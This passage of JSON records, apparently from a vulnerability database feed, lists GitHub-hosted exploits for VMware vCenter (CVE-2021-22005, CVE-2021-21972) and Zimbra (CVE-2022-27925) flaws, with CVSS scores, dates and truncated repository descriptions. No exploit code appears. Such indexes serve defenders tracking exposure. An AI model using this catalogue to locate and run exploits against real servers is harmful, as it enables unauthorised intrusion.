"baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-02T07:32:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-06-28T16:06:55", "id": "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-16T20:01:22", "description": "# CVE-2021-22005-\nCVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T07:19:42", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-07-16T13:57:16", "id": "97046A6F-8428-5DCF-88B4-4101351D637C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:03:13", "description": "# VMWare-C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T19:11:22", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-17T19:20:50", "id": "5ADFCBCF-BEC4-5B45-818D-9C25EAF0F9AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:04:56", "description": "# CVE-2021-22005\n\nVMware vCenter RCE CVE-2021-22005 one-liner ma...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:09:03", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-13T21:13:47", "id": "B31B0189-453E-5CA5-8FF3-5DC05043BE98", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T14:15:18", "description": "# CVE-2021-22005poc\nCVE-2021-22005 vcenter\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6279\u91cf\u9a8c\u8bc1poc\n\n\n\u4e00\u3001\u7528\u6cd5\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T13:11:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-03-15T03:51:38", "id": "9B660139-27C8-56B8-B9E2-8124D0E9F502", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:45:35", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T23:14:01", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-11-09T18:14:11", "id": "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T17:42:26", "description": "# CVE-2021-22005 - VMWare vCenter Server File Upload to RCE\n####...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T16:21:56", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-13T15:06:43", "id": "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:44:58", "description": "# CVE-2021-22005\n# VMware vCenter Server\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\n\n## Code By:Jun...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T08:36:21", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-02-27T01:06:12", "id": "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-31T08:46:10", "description": "# cve-2021-22005-exp\n\n## 0x01 \u6f0f\u6d1e\u7b80\u4ecb\n2021\u5e749\u670821\u65e5\uff0cVMware\u53d1\u5e03\u5b89\u5168\u516c\u544a\uff0c\u516c\u5f00\u62ab\u9732\u4e86...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-18T08:18:50", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-05-31T06:39:39", "id": "D97D0E5A-B60D-5B5B-93AC-3D6249E5A9C5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T15:00:08", "description": "Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-2...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-26T20:19:48", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-11-09T20:27:55", "id": "BD803D95-E2C1-554D-A0CD-6A594151E77B", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-22T16:04:09", "description": "Zimbra Unauthenticated Remote Code E...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-14T22:22:55", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-08-22T14:34:49", "id": "11DEDDB4-6148-5800-86D0-BF20A0453109", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-01T23:04:55", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-25T15:09:49", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-09-26T01:46:08", "id": "6BB3EE38-B4B6-590A-85A9-5EE59E4A9316", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:58:31", "description": "# CVE-2022-27925 (Zimbra RCE 2022)\n\nThis repo is part of the ***...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T10:33:55", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2023-05-19T03:10:08", "id": "549DF2E5-96E4-5204-9F2F-303AABC189EE", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-03T14:59:13", "description": "Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-2...", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-17T22:24:32", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Zimbra Collaboration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925"], "modified": "2022-10-07T03:31:22", "id": "A6071ED1-4DD2-5D98-9131-FEFBE84B4664", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:43", "description": "# VMware_vCenter_CVE-2021-21972\nVMware vCenter CVE-2021-21972 Re...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-27T10:27:04", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-14T04:48:32", "id": "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:18:01", "description": "**vsphereyeeter.sh** is an automated bash script to exploit vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T18:22:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-08-27T21:28:19", "id": "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-11T21:50:02", "description": "## \u4f7f\u7528\u65b9\u6cd5&\u514d\u8d23\u58f0\u660e\r\n\r\nVMware vCenter Server\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e (CVE-2021-21972)\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T10:16:20", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2022-08-11T16:29:19", "id": "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:57", "description": "# CVE-2021-21972\nCVE-2021-21972\n\nTested against VMware VCSA 6.7\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T13:04:37", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-07-14T14:37:02", "id": "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:51", "description": "# CVE-2021-21972\n\n### \u6f0f\u6d1e\u63cf\u8ff0\n\ncve-2021-21972\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n\u5177\u6709443\u7aef\u53e3\u8bbf\u95ee\u6743\u9650\u7684\u6076\u610f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T13:19:41", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-11-22T11:25:34", "id": "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:41:41", "description": "# CVE-2021-21972\nCVE-2021-21972\n\n\n# Works On\n\n- VMware-VCSA-all-...", "cvss3": {"exploitabilityScore": 3.9, 